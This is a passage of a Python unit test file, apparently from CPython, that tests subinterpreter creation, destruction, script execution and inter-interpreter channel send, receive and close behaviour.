def __new__(cls, pending=0, *, closed=False):
self = super().__new__(cls, pending, closed)
return self
def incr(self):
return type(self)(self.pending + 1, closed=self.closed)
def decr(self):
return type(self)(self.pending - 1, closed=self.closed)
def close(self, *, force=True):
if self.closed:
if not force or self.pending == 0:
return self
return type(self)(0 if force else self.pending, closed=True)
def run_action(cid, action, end, state, *, hideclosed=True):
if state.closed:
if action == 'use' and end == 'recv' and state.pending:
expectfail = False
else:
expectfail = True
else:
expectfail = False
try:
result = _run_action(cid, action, end, state)
except interpreters.ChannelClosedError:
if not hideclosed and not expectfail:
raise
result = state.close()
else:
if expectfail:
raise ... # XXX
return result
def _run_action(cid, action, end, state):
if action == 'use':
if end == 'send':
interpreters.channel_send(cid, b'spam')
return state.incr()
elif end == 'recv':
if not state.pending:
try:
interpreters.channel_recv(cid)
except interpreters.ChannelEmptyError:
return state
else:
raise Exception('expected ChannelEmptyError')
else:
interpreters.channel_recv(cid)
return state.decr()
else:
raise ValueError(end)
elif action == 'close':
kwargs = {}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close()
elif action == 'force-close':
kwargs = {
'force': True,
}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close(force=True)
else:
raise ValueError(action)
def clean_up_interpreters():
for id in interpreters.list_all():
if id == 0: # main
continue
try:
interpreters.destroy(id)
except RuntimeError:
pass # already destroyed
def clean_up_channels():
for cid in interpreters.channel_list_all():
try:
interpreters.channel_destroy(cid)
except interpreters.ChannelNotFoundError:
pass # already destroyed
class TestBase(unittest.TestCase):
def tearDown(self):
clean_up_interpreters()
clean_up_channels()
##################################
# misc. tests
class IsShareableTests(unittest.TestCase):
def test_default_shareables(self):
shareables = [
# singletons
None,
# builtin objects
b'spam',
'spam',
10,
-10,
]
for obj in shareables:
with self.subTest(obj):
self.assertTrue(
interpreters.is_shareable(obj))
def test_not_shareable(self):
class Cheese:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class SubBytes(bytes):
"""A subclass of a shareable type."""
not_shareables = [
# singletons
True,
False,
NotImplemented,
...,
# builtin types and objects
type,
object,
object(),
Exception(),
100.0,
# user-defined types and objects
Cheese,
Cheese('Wensleydale'),
SubBytes(b'spam'),
]
for obj in not_shareables:
with self.subTest(repr(obj)):
self.assertFalse(
interpreters.is_shareable(obj))
class ShareableTypeTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.cid = interpreters.channel_create()
def tearDown(self):
interpreters.channel_destroy(self.cid)
super().tearDown()
def _assert_values(self, values):
for obj in values:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
self.assertEqual(got, obj)
self.assertIs(type(got), type(obj))
# XXX Check the following in the channel tests?
#self.assertIsNot(got, obj)
def test_singletons(self):
for obj in [None]:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
# XXX What about between interpreters?
self.assertIs(got, obj)
def test_types(self):
self._assert_values([
b'spam',
9999,
self.cid,
])
def test_bytes(self):
self._assert_values(i.to_bytes(2, 'little', signed=True)
for i in range(-1, 258))
def test_strs(self):
self._assert_values(['hello world', '你好世界', ''])
def test_int(self):
self._assert_values(itertools.chain(range(-1, 258),
[sys.maxsize, -sys.maxsize - 1]))
def test_non_shareable_int(self):
ints = [
sys.maxsize + 1,
-sys.maxsize - 2,
2**1000,
]
for i in ints:
with self.subTest(i):
with self.assertRaises(OverflowError):
interpreters.channel_send(self.cid, i)
##################################
# interpreter tests
class ListAllTests(TestBase):
def test_initial(self):
main = interpreters.get_main()
ids = interpreters.list_all()
self.assertEqual(ids, [main])
def test_after_creating(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
ids = interpreters.list_all()
self.assertEqual(ids, [main, first, second])
def test_after_destroying(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
interpreters.destroy(first)
ids = interpreters.list_all()
self.assertEqual(ids, [main, second])
class GetCurrentTests(TestBase):
def test_main(self):
main = interpreters.get_main()
cur = interpreters.get_current()
self.assertEqual(cur, main)
self.assertIsInstance(cur, interpreters.InterpreterID)
def test_subinterpreter(self):
main = interpreters.get_main()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
cur = _interpreters.get_current()
print(cur)
assert isinstance(cur, _interpreters.InterpreterID)
"""))
cur = int(out.strip())
_, expected = interpreters.list_all()
self.assertEqual(cur, expected)
self.assertNotEqual(cur, main)
class GetMainTests(TestBase):
def test_from_main(self):
[expected] = interpreters.list_all()
main = interpreters.get_main()
self.assertEqual(main, expected)
self.assertIsInstance(main, interpreters.InterpreterID)
def test_from_subinterpreter(self):
[expected] = interpreters.list_all()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
main = _interpreters.get_main()
print(main)
assert isinstance(main, _interpreters.InterpreterID)
"""))
main = int(out.strip())
self.assertEqual(main, expected)
class IsRunningTests(TestBase):
def test_main(self):
main = interpreters.get_main()
self.assertTrue(interpreters.is_running(main))
@unittest.skip('Fails on FreeBSD')
def test_subinterpreter(self):
interp = interpreters.create()
self.assertFalse(interpreters.is_running(interp))
with _running(interp):
self.assertTrue(interpreters.is_running(interp))
self.assertFalse(interpreters.is_running(interp))
def test_from_subinterpreter(self):
interp = interpreters.create()
out = _run_output(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
if _interpreters.is_running({interp}):
print(True)
else:
print(False)
"""))
self.assertEqual(out.strip(), 'True')
def test_already_destroyed(self):
interp = interpreters.create()
interpreters.destroy(interp)
with self.assertRaises(RuntimeError):
interpreters.is_running(interp)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.is_running(-1)
class InterpreterIDTests(TestBase):
def test_with_int(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(int(id), 10)
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
id = interpreters.InterpreterID(Int(), force=True)
self.assertEqual(int(id), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters.InterpreterID, object())
self.assertRaises(TypeError, interpreters.InterpreterID, 10.0)
self.assertRaises(TypeError, interpreters.InterpreterID, '10')
self.assertRaises(TypeError, interpreters.InterpreterID, b'10')
self.assertRaises(ValueError, interpreters.InterpreterID, -1)
self.assertRaises(OverflowError, interpreters.InterpreterID, 2**64)
def test_does_not_exist(self):
id = interpreters.channel_create()
with self.assertRaises(RuntimeError):
interpreters.InterpreterID(int(id) + 1) # unforced
def test_str(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(str(id), '10')
def test_repr(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(repr(id), 'InterpreterID(10)')
def test_equality(self):
id1 = interpreters.create()
id2 = interpreters.InterpreterID(int(id1))
id3 = interpreters.create()
self.assertTrue(id1 == id1)
self.assertTrue(id1 == id2)
self.assertTrue(id1 == int(id1))
self.assertTrue(int(id1) == id1)
self.assertTrue(id1 == float(int(id1)))
self.assertTrue(float(int(id1)) == id1)
self.assertFalse(id1 == float(int(id1)) + 0.1)
self.assertFalse(id1 == str(int(id1)))
self.assertFalse(id1 == 2**1000)
self.assertFalse(id1 == float('inf'))
self.assertFalse(id1 == 'spam')
self.assertFalse(id1 == id3)
self.assertFalse(id1 != id1)
self.assertFalse(id1 != id2)
self.assertTrue(id1 != id3)
class CreateTests(TestBase):
def test_in_main(self):
id = interpreters.create()
self.assertIsInstance(id, interpreters.InterpreterID)
self.assertIn(id, interpreters.list_all())
@unittest.skip('enable this test when working on pystate.c')
def test_unique_id(self):
seen = set()
for _ in range(100):
id = interpreters.create()
interpreters.destroy(id)
seen.add(id)
self.assertEqual(len(seen), 100)
def test_in_thread(self):
lock = threading.Lock()
id = None
def f():
nonlocal id
id = interpreters.create()
lock.acquire()
lock.release()
t = threading.Thread(target=f)
with lock:
t.start()
t.join()
self.assertIn(id, interpreters.list_all())
def test_in_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
assert isinstance(id, _interpreters.InterpreterID)
"""))
id2 = int(out.strip())
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_in_threaded_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = None
def f():
nonlocal id2
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
"""))
id2 = int(out.strip())
t = threading.Thread(target=f)
t.start()
t.join()
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_after_destroy_all(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
ids = []
for _ in range(3):
id = interpreters.create()
ids.append(id)
# Now destroy them.
for id in ids:
interpreters.destroy(id)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id})
def test_after_destroy_some(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
# Now destroy 2 of them.
interpreters.destroy(id1)
interpreters.destroy(id3)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id, id2})
class DestroyTests(TestBase):
def test_one(self):
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
self.assertIn(id2, interpreters.list_all())
interpreters.destroy(id2)
self.assertNotIn(id2, interpreters.list_all())
self.assertIn(id1, interpreters.list_all())
self.assertIn(id3, interpreters.list_all())
def test_all(self):
before = set(interpreters.list_all())
ids = set()
for _ in range(3):
id = interpreters.create()
ids.add(id)
self.assertEqual(set(interpreters.list_all()), before | ids)
for id in ids:
interpreters.destroy(id)
self.assertEqual(set(interpreters.list_all()), before)
def test_main(self):
main, = interpreters.list_all()
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
def f():
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
t = threading.Thread(target=f)
t.start()
t.join()
def test_already_destroyed(self):
id = interpreters.create()
interpreters.destroy(id)
with self.assertRaises(RuntimeError):
interpreters.destroy(id)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.destroy(-1)
def test_from_current(self):
main, = interpreters.list_all()
id = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
try:
_interpreters.destroy({id})
except RuntimeError:
pass
""")
interpreters.run_string(id, script)
self.assertEqual(set(interpreters.list_all()), {main, id})
def test_from_sibling(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.destroy({id2})
""")
interpreters.run_string(id1, script)
self.assertEqual(set(interpreters.list_all()), {main, id1})
def test_from_other_thread(self):
id = interpreters.create()
def f():
interpreters.destroy(id)
t = threading.Thread(target=f)
t.start()
t.join()
def test_still_running(self):
main, = interpreters.list_all()
interp = interpreters.create()
with _running(interp):
self.assertTrue(interpreters.is_running(interp),
msg=f"Interp {interp} should be running before destruction.")
with self.assertRaises(RuntimeError,
msg=f"Should not be able to destroy interp {interp} while it's still running."):
interpreters.destroy(interp)
self.assertTrue(interpreters.is_running(interp))
class RunStringTests(TestBase):
def setUp(self):
super().setUp()
self.id = interpreters.create()
def test_success(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
def test_in_thread(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
def f():
interpreters.run_string(self.id, script)
t = threading.Thread(target=f)
t.start()
t.join()
out = file.read()
self.assertEqual(out, 'it worked!')
def test_create_thread(self):
subinterp = interpreters.create(isolated=False)
script, file = _captured_script("""
import threading
def f():
print('it worked!', end='')
t = threading.Thread(target=f)
t.start()
t.join()
""")
with file:
interpreters.run_string(subinterp, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
def test_fork(self):
import tempfile
with tempfile.NamedTemporaryFile('w+') as file:
file.write('')
file.flush()
expected = 'spam spam spam spam spam'
script = dedent(f"""
import os
try:
os.fork()
except RuntimeError:
with open('{file.name}', 'w') as out:
out.write('{expected}')
""")
interpreters.run_string(self.id, script)
file.seek(0)
content = file.read()
self.assertEqual(content, expected)
def test_already_running(self):
with _running(self.id):
with self.assertRaises(RuntimeError):
interpreters.run_string(self.id, 'print("spam")')
def test_does_not_exist(self):
id = 0
while id in interpreters.list_all():
id += 1
with self.assertRaises(RuntimeError):
interpreters.run_string(id, 'print("spam")')
def test_error_id(self):
with self.assertRaises(ValueError):
interpreters.run_string(-1, 'print("spam")')
def test_bad_id(self):
with self.assertRaises(TypeError):
interpreters.run_string('spam', 'print("spam")')
def test_bad_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, 10)
def test_bytes_for_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, b'print("spam")')
@contextlib.contextmanager
def assert_run_failed(self, exctype, msg=None):
with self.assertRaises(interpreters.RunFailedError) as caught:
yield
if msg is None:
self.assertEqual(str(caught.exception).split(':')[0],
str(exctype))
else:
self.assertEqual(str(caught.exception),
"{}: {}".format(exctype, msg))
def test_invalid_syntax(self):
with self.assert_run_failed(SyntaxError):
# missing close paren
interpreters.run_string(self.id, 'print("spam"')
def test_failure(self):
with self.assert_run_failed(Exception, 'spam'):
interpreters.run_string(self.id, 'raise Exception("spam")')
def test_SystemExit(self):
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, 'raise SystemExit(42)')
def test_sys_exit(self):
with self.assert_run_failed(SystemExit):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit()
"""))
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit(42)
"""))
def test_with_shared(self):
r, w = os.pipe()
shared = {
'spam': b'ham',
'eggs': b'-1',
'cheddar': None,
}
script = dedent(f"""
eggs = int(eggs)
spam = 42
result = spam + eggs
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['spam'], 42)
self.assertEqual(ns['eggs'], -1)
self.assertEqual(ns['result'], 41)
self.assertIsNone(ns['cheddar'])
def test_shared_overwrites(self):
interpreters.run_string(self.id, dedent("""
spam = 'eggs'
ns1 = dict(vars())
del ns1['__builtins__']
"""))
shared = {'spam': b'ham'}
script = dedent(f"""
ns2 = dict(vars())
del ns2['__builtins__']
""")
interpreters.run_string(self.id, script, shared)
r, w = os.pipe()
script = dedent(f"""
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['ns1']['spam'], 'eggs')
self.assertEqual(ns['ns2']['spam'], b'ham')
self.assertEqual(ns['spam'], b'ham')
def test_shared_overwrites_default_vars(self):
r, w = os.pipe()
shared = {'__name__': b'not __main__'}
script = dedent(f"""
spam = 42
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['__name__'], b'not __main__')
def test_main_reused(self):
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
spam = True
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
del ns, pickle, chan
"""))
with open(r, 'rb') as chan:
ns1 = pickle.load(chan)
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
eggs = False
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
"""))
with open(r, 'rb') as chan:
ns2 = pickle.load(chan)
self.assertIn('spam', ns1)
self.assertNotIn('eggs', ns1)
self.assertIn('eggs', ns2)
self.assertIn('spam', ns2)
def test_execution_namespace_is_main(self):
r, w = os.pipe()
script = dedent(f"""
spam = 42
ns = dict(vars())
ns['__builtins__'] = str(ns['__builtins__'])
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
ns.pop('__builtins__')
ns.pop('__loader__')
self.assertEqual(ns, {
'__name__': '__main__',
'__annotations__': {},
'__doc__': None,
'__package__': None,
'__spec__': None,
'spam': 42,
})
# XXX Fix this test!
@unittest.skip('blocking forever')
def test_still_running_at_exit(self):
script = dedent(f"""
from textwrap import dedent
import threading
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
def f():
_interpreters.run_string(id, dedent('''
import time
# Give plenty of time for the main interpreter to finish.
time.sleep(1_000_000)
'''))
t = threading.Thread(target=f)
t.start()
""")
with support.temp_dir() as dirname:
filename = script_helper.make_script(dirname, 'interp', script)
with script_helper.spawn_python(filename) as proc:
retcode = proc.wait()
self.assertEqual(retcode, 0)
##################################
# channel tests
class ChannelIDTests(TestBase):
def test_default_kwargs(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(int(cid), 10)
self.assertEqual(cid.end, 'both')
def test_with_kwargs(self):
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, send=True, recv=False, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, recv=True, send=False, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(cid.end, 'both')
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
cid = interpreters._channel_id(Int(), force=True)
self.assertEqual(int(cid), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters._channel_id, object())
self.assertRaises(TypeError, interpreters._channel_id, 10.0)
self.assertRaises(TypeError, interpreters._channel_id, '10')
self.assertRaises(TypeError, interpreters._channel_id, b'10')
self.assertRaises(ValueError, interpreters._channel_id, -1)
self.assertRaises(OverflowError, interpreters._channel_id, 2**64)
def test_bad_kwargs(self):
with self.assertRaises(ValueError):
interpreters._channel_id(10, send=False, recv=False)
def test_does_not_exist(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters._channel_id(int(cid) + 1) # unforced
def test_str(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(str(cid), '10')
def test_repr(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, send=True)')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, recv=True)')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
def test_equality(self):
cid1 = interpreters.channel_create()
cid2 = interpreters._channel_id(int(cid1))
cid3 = interpreters.channel_create()
self.assertTrue(cid1 == cid1)
self.assertTrue(cid1 == cid2)
self.assertTrue(cid1 == int(cid1))
self.assertTrue(int(cid1) == cid1)
self.assertTrue(cid1 == float(int(cid1)))
self.assertTrue(float(int(cid1)) == cid1)
self.assertFalse(cid1 == float(int(cid1)) + 0.1)
self.assertFalse(cid1 == str(int(cid1)))
self.assertFalse(cid1 == 2**1000)
self.assertFalse(cid1 == float('inf'))
self.assertFalse(cid1 == 'spam')
self.assertFalse(cid1 == cid3)
self.assertFalse(cid1 != cid1)
self.assertFalse(cid1 != cid2)
self.assertTrue(cid1 != cid3)
class ChannelTests(TestBase):
def test_create_cid(self):
cid = interpreters.channel_create()
self.assertIsInstance(cid, interpreters.ChannelID)
def test_sequential_ids(self):
before = interpreters.channel_list_all()
id1 = interpreters.channel_create()
id2 = interpreters.channel_create()
id3 = interpreters.channel_create()
after = interpreters.channel_list_all()
self.assertEqual(id2, int(id1) + 1)
self.assertEqual(id3, int(id2) + 1)
self.assertEqual(set(after) - set(before), {id1, id2, id3})
def test_ids_global(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid1 = int(out.strip())
id2 = interpreters.create()
out = _run_output(id2, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid2 = int(out.strip())
self.assertEqual(cid2, int(cid1) + 1)
def test_channel_list_interpreters_none(self):
"""Test listing interpreters for a channel with no associations."""
# Test for channel with no associated interpreters.
cid = interpreters.channel_create()
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [])
self.assertEqual(recv_interps, [])
def test_channel_list_interpreters_basic(self):
"""Test basic listing channel interpreters."""
interp0 = interpreters.get_main()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
# Test for a channel that has one end associated to an interpreter.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [])
interp1 = interpreters.create()
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Test for channel that has boths ends associated to an interpreter.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [interp1])
def test_channel_list_interpreters_multiple(self):
"""Test listing interpreters for a channel with many associations."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
interp2 = interpreters.create()
interp3 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, "send")
"""))
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
_run_output(interp3, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(set(send_interps), {interp0, interp1})
self.assertEqual(set(recv_interps), {interp2, interp3})
def test_channel_list_interpreters_destroyed(self):
"""Test listing channel interpreters with a destroyed interpreter."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Should be one interpreter associated with each end.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [interp1])
interpreters.destroy(interp1)
# Destroyed interpreter should not be listed.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [])
def test_channel_list_interpreters_released(self):
"""Test listing channel interpreters with a released channel."""
# Set up one channel with main interpreter on the send end and two
# subinterpreters on the receive end.
interp0 = interpreters.get_main()
interp1 = interpreters.create()
interp2 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "data")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
interpreters.channel_send(cid, "data")
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Check the setup.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 2)
# Release the main interpreter from the send end.
interpreters.channel_release(cid, send=True)
# Send end should have no associated interpreters.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 0)
self.assertEqual(len(recv_interps), 2)
# Release one of the subinterpreters from the receive end.
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
# Receive end should have the released interpreter removed.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 0)
self.assertEqual(recv_interps, [interp1])
def test_channel_list_interpreters_closed(self):
"""Test listing channel interpreters with a closed channel."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
# Put something in the channel so that it's not empty.
interpreters.channel_send(cid, "send")
# Check initial state.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 0)
# Force close the channel.
interpreters.channel_close(cid, force=True)
# Both ends should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=False)
def test_channel_list_interpreters_closed_send_end(self):
"""Test listing channel interpreters with a channel's send end closed."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
# Put something in the channel so that it's not empty.
interpreters.channel_send(cid, "send")
# Check initial state.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 0)
# Close the send end of the channel.
interpreters.channel_close(cid, send=True)
# Send end should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
# Receive end should not be closed (since channel is not empty).
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(recv_interps), 0)
# Close the receive end of the channel from a subinterpreter.
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
# Both ends should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=False)
####################
def test_send_recv_main(self):
cid = interpreters.channel_create()
orig = b'spam'
interpreters.channel_send(cid, orig)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, orig)
self.assertIsNot(obj, orig)
def test_send_recv_same_interpreter(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
orig = b'spam'
_interpreters.channel_send(cid, orig)
obj = _interpreters.channel_recv(cid)
assert obj is not orig
assert obj == orig
"""))
def test_send_recv_different_interpreters(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = _run_output(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_threads(self):
cid = interpreters.channel_create()
def f():
while True:
try:
obj = interpreters.channel_recv(cid)
break
except interpreters.ChannelEmptyError:
time.sleep(0.1)
interpreters.channel_send(cid, obj)
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_interpreters_and_threads(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = None
def f():
nonlocal out
out = _run_output(id1, dedent(f"""
import time
import _xxsubinterpreters as _interpreters
while True:
try:
obj = _interpreters.channel_recv({cid})
break
except _interpreters.ChannelEmptyError:
time.sleep(0.1)
assert(obj == b'spam')
_interpreters.channel_send({cid}, b'eggs')
"""))
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'eggs')
def test_send_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_send(10, b'spam')
def test_recv_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_recv(10)
def test_recv_empty(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelEmptyError):
interpreters.channel_recv(cid)
def test_recv_default(self):
default = object()
cid = interpreters.channel_create()
obj1 = interpreters.channel_recv(cid, default)
interpreters.channel_send(cid, None)
interpreters.channel_send(cid, 1)
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'eggs')
obj2 = interpreters.channel_recv(cid, default)
obj3 = interpreters.channel_recv(cid, default)
obj4 = interpreters.channel_recv(cid)
obj5 = interpreters.channel_recv(cid, default)
obj6 = interpreters.channel_recv(cid, default)
self.assertIs(obj1, default)
self.assertIs(obj2, None)
self.assertEqual(obj3, 1)
self.assertEqual(obj4, b'spam')
self.assertEqual(obj5, b'eggs')
self.assertIs(obj6, default)
def test_run_string_arg_unresolved(self):
cid = interpreters.channel_create()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(cid.end)
_interpreters.channel_send(cid, b'spam')
"""),
dict(cid=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
